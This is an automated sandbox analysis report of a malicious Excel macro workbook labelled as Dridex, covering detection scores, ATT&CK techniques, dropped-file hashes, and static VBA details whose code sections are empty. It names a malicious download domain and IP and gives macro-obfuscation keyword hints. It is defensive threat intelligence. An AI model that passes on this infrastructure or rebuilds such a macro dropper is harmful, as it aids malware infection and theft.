Analysis Report Dridex-06-bc1b.xlsm
Overview
General Information
Detection
Score: | 92 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
Startup |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
No yara matches |
---|
Sigma Overview |
---|
System Summary: |
---|
Sigma detected: Microsoft Office Product Spawning Windows Shell | Show sources |
Source: | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: |
Signature Overview |
---|
Click to jump to signature section
AV Detection: |
---|
Antivirus / Scanner detection for submitted sample | Show sources |
Source: | Avira: |
Multi AV Scanner detection for domain / URL | Show sources |
Source: | Virustotal: | Perma Link |
Multi AV Scanner detection for submitted file | Show sources |
Source: | Virustotal: | Perma Link | ||
Source: | ReversingLabs: |
Compliance: |
---|
Uses new MSVCR Dlls | Show sources |
Source: | File opened: | Jump to behavior |
Uses secure TLS version for HTTPS connections | Show sources |
Source: | HTTPS traffic detected: |
Software Vulnerabilities: |
---|
Document exploit detected (UrlDownloadToFile) | Show sources |
Source: | Section loaded: | Jump to behavior |
Document exploit detected (process start blacklist hit) | Show sources |
Source: | Process created: | Jump to behavior |
Source: | DNS query: |
Source: | TCP traffic: |
Source: | TCP traffic: |
Source: | IP Address: |
Source: | ASN Name: |
Source: | JA3 fingerprint: |
Source: | File created: | Jump to behavior |
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | HTTPS traffic detected: |
System Summary: |
---|
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) | Show sources |
Source: | Screenshot OCR: |
Document contains an embedded VBA macro which may execute processes | Show sources |
Source: | OLE, VBA macro: | Name: PagamentoDocumento | ||
Source: | OLE, VBA macro: | Name: PagamentoDocumento |
Found Excel 4.0 Macro with suspicious formulas | Show sources |
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: |
Source: | OLE, VBA macro line: | |||
Source: | OLE, VBA macro: | Name: pagoUno_Layout |
Source: | OLE indicator, VBA macros: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Virustotal: | ||
Source: | ReversingLabs: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Automated click: | ||
Source: | Automated click: |
Source: | Window detected: |
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: |
Source: | Key opened: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Initial sample: |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting22 | Path Interception | Process Injection1 | Masquerading1 | OS Credential Dumping | File and Directory Discovery1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Encrypted Channel2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Exploitation for Client Execution23 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools1 | LSASS Memory | System Information Discovery2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Application Layer Protocol1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection1 | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Application Layer Protocol2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Scripting22 | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Ingress Tool Transfer1 | SIM Card Swap | Carrier Billing Fraud |
Behavior Graph |
---|
Screenshots |
---|
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
51% | Virustotal | Browse | ||
5% | Metadefender | Browse | ||
59% | ReversingLabs | Document-Word.Trojan.Ursnif | ||
100% | Avira | W2000M/Agent.1970033 |
Dropped Files |
---|
No Antivirus matches |
---|
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
13% | Virustotal | Browse |
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
Domains and IPs |
---|
Contacted Domains |
---|
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
compagniamaestro.com | 199.192.21.36 | true | true |
| unknown |
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false |
| unknown | ||
false | high | |||
false |
| low |
Contacted IPs |
---|
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
199.192.21.36 | unknown | United States | 22612 | NAMECHEAP-NETUS | true |
General Information |
---|
Joe Sandbox Version: | 31.0.0 Emerald |
Analysis ID: | 344478 |
Start date: | 26.01.2021 |
Start time: | 16:15:51 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 5m 19s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | Dridex-06-bc1b.xlsm |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of analysed new started processes analysed: | 6 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal92.expl.evad.winXLSM@7/16@1/1 |
EGA Information: | Failed |
HDC Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
Warnings: | Show All
|
Simulations |
---|
Behavior and APIs |
---|
No simulations |
---|
Joe Sandbox View / Context |
---|
IPs |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
199.192.21.36 | Get hash | malicious | Browse | ||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse |
Domains |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
compagniamaestro.com | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
NAMECHEAP-NETUS | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
JA3 Fingerprints |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
7dcce5b76c8b17472d024758970a406b | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
Dropped Files |
---|
No context |
---|
Created / dropped Files |
---|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 45017 |
Entropy (8bit): | 5.1653486867978575 |
Encrypted: | false |
SSDEEP: | 768:tqnkaQ3w/C5kmWGHbqgPiZZz/aZSO7b62pQTVPQudQQ0mpVcQrvJoOk:AnkaQ3w/C5kmWsbqgPiHz/ar7NeBPQuG |
MD5: | 4B04126D788D6958C2C62DCE6FE37988 |
SHA1: | 1705C60E4BD29956E80BD34267F16F800037ED35 |
SHA-256: | 00D2F1928F6FD6B0B85CC91EB6B4EDB7A9A3A9E532C09B908E3A5ECFF2845FC0 |
SHA-512: | 57A0B3892F3754C57A318BEC9E789D7B6DCA4C8AECDCD66BDA864487254AB2A993F5A56495D3F3C9F4FBFD7BD75CD01FB2FE33D26A55092DED4A6E30B5996359 |
Malicious: | true |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 45017 |
Entropy (8bit): | 5.1653486867978575 |
Encrypted: | false |
SSDEEP: | 768:tqnkaQ3w/C5kmWGHbqgPiZZz/aZSO7b62pQTVPQudQQ0mpVcQrvJoOk:AnkaQ3w/C5kmWsbqgPiHz/ar7NeBPQuG |
MD5: | 4B04126D788D6958C2C62DCE6FE37988 |
SHA1: | 1705C60E4BD29956E80BD34267F16F800037ED35 |
SHA-256: | 00D2F1928F6FD6B0B85CC91EB6B4EDB7A9A3A9E532C09B908E3A5ECFF2845FC0 |
SHA-512: | 57A0B3892F3754C57A318BEC9E789D7B6DCA4C8AECDCD66BDA864487254AB2A993F5A56495D3F3C9F4FBFD7BD75CD01FB2FE33D26A55092DED4A6E30B5996359 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 45017 |
Entropy (8bit): | 5.1653486867978575 |
Encrypted: | false |
SSDEEP: | 768:tqnkaQ3w/C5kmWGHbqgPiZZz/aZSO7b62pQTVPQudQQ0mpVcQrvJoOk:AnkaQ3w/C5kmWsbqgPiHz/ar7NeBPQuG |
MD5: | 4B04126D788D6958C2C62DCE6FE37988 |
SHA1: | 1705C60E4BD29956E80BD34267F16F800037ED35 |
SHA-256: | 00D2F1928F6FD6B0B85CC91EB6B4EDB7A9A3A9E532C09B908E3A5ECFF2845FC0 |
SHA-512: | 57A0B3892F3754C57A318BEC9E789D7B6DCA4C8AECDCD66BDA864487254AB2A993F5A56495D3F3C9F4FBFD7BD75CD01FB2FE33D26A55092DED4A6E30B5996359 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 58936 |
Entropy (8bit): | 7.994797855729196 |
Encrypted: | true |
SSDEEP: | 768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj |
MD5: | E4F1E21910443409E81E5B55DC8DE774 |
SHA1: | EC0885660BD216D0CDD5E6762B2F595376995BD0 |
SHA-256: | CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5 |
SHA-512: | 2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246 |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 893 |
Entropy (8bit): | 7.366016576663508 |
Encrypted: | false |
SSDEEP: | 24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x |
MD5: | D4AE187B4574036C2D76B6DF8A8C1A30 |
SHA1: | B06F409FA14BAB33CBAF4A37811B8740B624D9E5 |
SHA-256: | A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7 |
SHA-512: | 1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 326 |
Entropy (8bit): | 3.123186963792904 |
Encrypted: | false |
SSDEEP: | 6:kKrZwwDN+SkQlPlEGYRMY9z+4KlDA3RUegeT6lf:SkPlE99SNxAhUegeT2 |
MD5: | 7E0054FA6C074543BC9B37D934E8D2DF |
SHA1: | BF35F8FEE206925C323B66BCE8E35582F97AA141 |
SHA-256: | DBE4735D4110A227E4A873ADC52C6A58A80929FF1B260ED44E300AF874586F2C |
SHA-512: | 844BCD48869A7590E9D4B914F1654551A10B87E314C06633C48A484501E17B7DA8F80269AFA18539F7BE5DF19ACFF13BDF1D9A0414A14BD6088C043940AAE1F6 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 252 |
Entropy (8bit): | 3.0294634724686764 |
Encrypted: | false |
SSDEEP: | 3:kkFklJxkSfllXlE/QhzllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB1UAYpFit:kK4kIliBAIdQZV7eAYLit |
MD5: | 515ABC50F072563813F74B645FAA09D5 |
SHA1: | 5140FDCA9F17840721C22BEA2AF5B78EBA18C08E |
SHA-256: | BC1FB59C03A1BC54D0EF895C91E04B0BFD80CA55D3CA39BC311B3899EA94087B |
SHA-512: | 8CEB5158E12F4D9B05EFC5C80F73F20E9CA189C02CACB2EF111414B724AB25C42C4B751956BB60C7B49DCBBA7ADB6E3C8052574AF6E57D0303B294B41DFCAA81 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | downloaded |
Size (bytes): | 45017 |
Entropy (8bit): | 5.1653486867978575 |
Encrypted: | false |
SSDEEP: | 768:tqnkaQ3w/C5kmWGHbqgPiZZz/aZSO7b62pQTVPQudQQ0mpVcQrvJoOk:AnkaQ3w/C5kmWsbqgPiHz/ar7NeBPQuG |
MD5: | 4B04126D788D6958C2C62DCE6FE37988 |
SHA1: | 1705C60E4BD29956E80BD34267F16F800037ED35 |
SHA-256: | 00D2F1928F6FD6B0B85CC91EB6B4EDB7A9A3A9E532C09B908E3A5ECFF2845FC0 |
SHA-512: | 57A0B3892F3754C57A318BEC9E789D7B6DCA4C8AECDCD66BDA864487254AB2A993F5A56495D3F3C9F4FBFD7BD75CD01FB2FE33D26A55092DED4A6E30B5996359 |
Malicious: | false |
Reputation: | low |
IE Cache URL: | https://compagniamaestro.com/ |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 1976 |
Entropy (8bit): | 1.9759705070369498 |
Encrypted: | false |
SSDEEP: | 12:Yn9e/kaHslqLYp0FIQ4+P/k1EijBdShS8u1NnNlou1NRztDAcqdckgDWojkMXNVf:YniVH9a0x4I8BAKNHoKNfDn9tUs0zCp |
MD5: | 1C7221B8A7104792FDEEA41E5D7BA0D0 |
SHA1: | D49122E2BF94D92ED067570D638B672855C05893 |
SHA-256: | 76F287B1E3251B7E0E5BA27BFB05B35831150CC665DE00F9FD2D807E2D2A028D |
SHA-512: | 928EF6FCCDB96A4AADD35D36171F3D09DE5605A70FE505862A294F089FEF53E697426017D3973B9BCAFF8D579A8A85C38943DCF47C5C5DD1187AB1A20D50E473 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 1005 |
Entropy (8bit): | 7.551834228633037 |
Encrypted: | false |
SSDEEP: | 24:aB2uoC0w2bONUV99upE4ZXn8bf4F0T+xAlO6y:BuoBwawUV99/4ZXn8bT6AOf |
MD5: | DA5C67B7042BB04E6BFB9F60D9470287 |
SHA1: | BFBDC4596111EF5D95183DB0526353CBCA84C43F |
SHA-256: | 0522D7C7600F1DD56346450DFE1466BA51CFEBCD095CD3154FB30DC563F96763 |
SHA-512: | D16BCF49A56F0FB926DB7C8DA413A976E1D0F53DA5EA73B729A5D11FFCF42FA149D17D3587A3DF56665C6CAAC44F903CA5D0278DCFDA8FE3C43318724C3507EE |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 5305 |
Entropy (8bit): | 7.83628317482236 |
Encrypted: | false |
SSDEEP: | 96:ndsgj5y6EGgWKW/WkPsLhsKto+bDOukamzejtjcF+6QTzys5kcWCgupHLib:ndsgjI6RdKcXOn9b9vmUgs6QXys+NYW |
MD5: | 31F86AA3BD1ADA53D99B7BBEF6A1DEFC |
SHA1: | 148331C2D5EB437437D48ABE51866384D7154044 |
SHA-256: | E0EC55345EDC7EF4BBE4F20ABD6F8FE965475C632766FAE6CA1853674F2DC34C |
SHA-512: | 96D1DC354DCB3A262B997A98E83A0162F0F9E93050C7BC952B46FB886336C1C6370B3D5A9316039FD84211161F34BA3A866B8DFD385323551743674A24FF7B39 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 43608 |
Entropy (8bit): | 7.775661687189793 |
Encrypted: | false |
SSDEEP: | 768:w0PwCVsTx8txX/vR1IUfSQVg4MMOo0JzAcTlrz5RzXO+iFoWZxeh9E9S:w0PHsdgFXffDOo0JzAC1t++UoWZxeh9D |
MD5: | 4729F4D4D3E6A40897714474BD193698 |
SHA1: | 1732E41AD6A7A026F51541AF370BBEDDC3C29192 |
SHA-256: | BBC203190FCC1C1C9B14E09A5A17DB8C20DFF8792DFA2F75387C66C93D36AADB |
SHA-512: | 0CCFECDADDBA30755CF5BE0F4AD460E0DB09EB9F52EADBFF8D519F4D8962322B0CB520E75CAE03569389AF3903B9C1C0579F9EC4B785B1B2BBF1E6ED60743632 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 58936 |
Entropy (8bit): | 7.994797855729196 |
Encrypted: | true |
SSDEEP: | 768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj |
MD5: | E4F1E21910443409E81E5B55DC8DE774 |
SHA1: | EC0885660BD216D0CDD5E6762B2F595376995BD0 |
SHA-256: | CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5 |
SHA-512: | 2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 241332 |
Entropy (8bit): | 4.206817415570808 |
Encrypted: | false |
SSDEEP: | 1536:cG2LEQNSk8SCtKBX0Gpb2vxKHnVMOkOX0mRO/NIAIQK7viKAJYsA0ppDCLTfMRsi:cTNNSk8DtKBrpb2vxrOpprf/nVq |
MD5: | FDC005848930295BD2BEDC28CDDF4E57 |
SHA1: | 425ACD9C11F3ADD39533B5859DA2D4FBFC3C66EE |
SHA-256: | 14D206152AB901B785CA013A80585FBA93F329324E1304DB04AA380A3C76F1A9 |
SHA-512: | C70BA3D8F0643DFC3D514D573A7DA52E96BB3AB1DE4223E3CD51B34DD1B20D0E5CD493EA7710183CED563F821EF92C1CC6C63EF3BD81705D4471E71F62B593E8 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 152533 |
Entropy (8bit): | 6.31602258454967 |
Encrypted: | false |
SSDEEP: | 1536:SIPLlYy2pRSjgCyrYBb5HQop4Ydm6CWku2PtIz0jD1rfJs42t6WP:S4LIpRScCy+fdmcku2PagwQA |
MD5: | D0682A3C344DFC62FB18D5A539F81F61 |
SHA1: | 09D3E9B899785DA377DF2518C6175D70CCF9DA33 |
SHA-256: | 4788F7F15DE8063BB3B2547AF1BD9CDBD0596359550E53EC98E532B2ADB5EC5A |
SHA-512: | 0E884D65C738879C7038C8FB592F53DD515E630AEACC9D9E5F9013606364F092ACF7D832E1A8DAC86A1F0B0E906B2302EE3A840A503654F2B39A65B2FEA04EC3 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 165 |
Entropy (8bit): | 1.4377382811115937 |
Encrypted: | false |
SSDEEP: | 3:vZ/FFDJw2fV:vBFFGS |
MD5: | 797869BB881CFBCDAC2064F92B26E46F |
SHA1: | 61C1B8FBF505956A77E9A79CE74EF5E281B01F4B |
SHA-256: | D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185 |
SHA-512: | 1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D |
Malicious: | true |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 7.6136938439046835 |
TrID: |
|
File name: | Dridex-06-bc1b.xlsm |
File size: | 29655 |
MD5: | f72f88ebdf048fdfedf0aa3e298d9e71 |
SHA1: | b8ea58415338bed65d4cd194ead6ac663ad71a6c |
SHA256: | 78ccf25ecee02f759cefa6b1c29a00fb4ce64c000f7b9c04c1fc08e04d04bc1b |
SHA512: | 0c6d96fcda11df417cfd48d51753d5a6334d80df04b3709ccbfc8a2d5d073822ad606da49e99c724a9d5bd16a98a623f2f9f3a2cbfe2b01bc668f44991db2903 |
SSDEEP: | 384:flRwzF2FBLDDBf2kbi+lj4YhX8rRI6vXO9BvGiSmDU+P4QRdUgE5cF9Y3XF:fDAFqP1u6NsrRzXO+iSkU+waSxcF9YnF |
File Content Preview: | PK..........!.c...............[Content_Types].xml ...(......................................................................................................................................................................................................... |
File Icon |
---|
Icon Hash: | e4e2aa8aa4bcbcac |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OpenXML | |
Number of OLE Files: | 2 |
OLE File "/opt/package/joesandbox/database/analysis/344478/sample/Dridex-06-bc1b.xlsm" |
---|
Indicators | |
---|---|
Has Summary Info: | False |
Application Name: | unknown |
Encrypted Document: | False |
Contains Word Document Stream: | |
Contains Workbook/Book Stream: | |
Contains PowerPoint Document Stream: | |
Contains Visio Document Stream: | |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: | True |
Summary | |
---|---|
Author: | |
Last Saved By: | |
Create Time: | 2020-11-24T09:53:01Z |
Last Saved Time: | 2020-11-24T11:16:24Z |
Creating Application: | |
Security: | 0 |
Document Summary | |
---|---|
Thumbnail Scaling Desired: | false |
Company: | |
Contains Dirty Links: | false |
Shared Document: | false |
Changed Hyperlinks: | false |
Application Version: | 16.0300 |
Streams with VBA |
---|
VBA File Name: Foglio1.cls, Stream Size: 2640 |
---|
General | |
---|---|
Stream Path: | VBA/Foglio1 |
VBA File Name: | Foglio1.cls |
Stream Size: | 2640 |
Data ASCII: | . . . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . p . . N . . . . c . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . p a g o U n o , 1 0 , 0 , M S F o r m s , F r a m e . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . |
Data Raw: | 01 16 03 00 00 12 01 00 00 fc 03 00 00 f6 00 00 00 22 02 00 00 ff ff ff ff 03 04 00 00 a7 07 00 00 00 00 00 00 01 00 00 00 70 fe ed 4e 00 00 ff ff 63 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
VBA Code Keywords |
---|
Keyword |
---|
PagamentoDocumento |
VB_Name |
VB_Creatable |
Application.OnTime |
VB_Exposed |
Frame" |
Len(n) |
VB_Control |
"TURN()": |
VB_Customizable |
"Aut" |
ActiveSheet.UsedRange.SpecialCells(xlCellTypeConstants): |
"=RE" |
Replace(E, |
"pagoUno, |
"BarUno" |
Chr(Asc(Mid(n, |
Split(u, |
PagamentoDocumento() |
VB_TemplateDerived |
MSForms, |
False |
excell() |
excell |
Attribute |
Private |
VB_PredeclaredId |
VB_GlobalNameSpace |
pagoUno_Layout() |
VB_Base |
VBA Code |
---|
|
VBA File Name: Modulo1.bas, Stream Size: 889 |
---|
General | |
---|---|
Stream Path: | VBA/Modulo1 |
VBA File Name: | Modulo1.bas |
Stream Size: | 889 |
Data ASCII: | . . . . . . . . . z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 01 16 03 00 00 f0 00 00 00 7a 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 81 02 00 00 19 03 00 00 00 00 00 00 01 00 00 00 70 fe a5 6b 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
VBA Code Keywords |
---|
Keyword |
---|
Attribute |
VB_Name |
BarUno() |
ActiveWorkbook.Close |
VBA Code |
---|
|
VBA File Name: Questa_cartella_di_lavoro.cls, Stream Size: 1014 |
---|
General | |
---|---|
Stream Path: | VBA/Questa_cartella_di_lavoro |
VBA File Name: | Questa_cartella_di_lavoro.cls |
Stream Size: | 1014 |
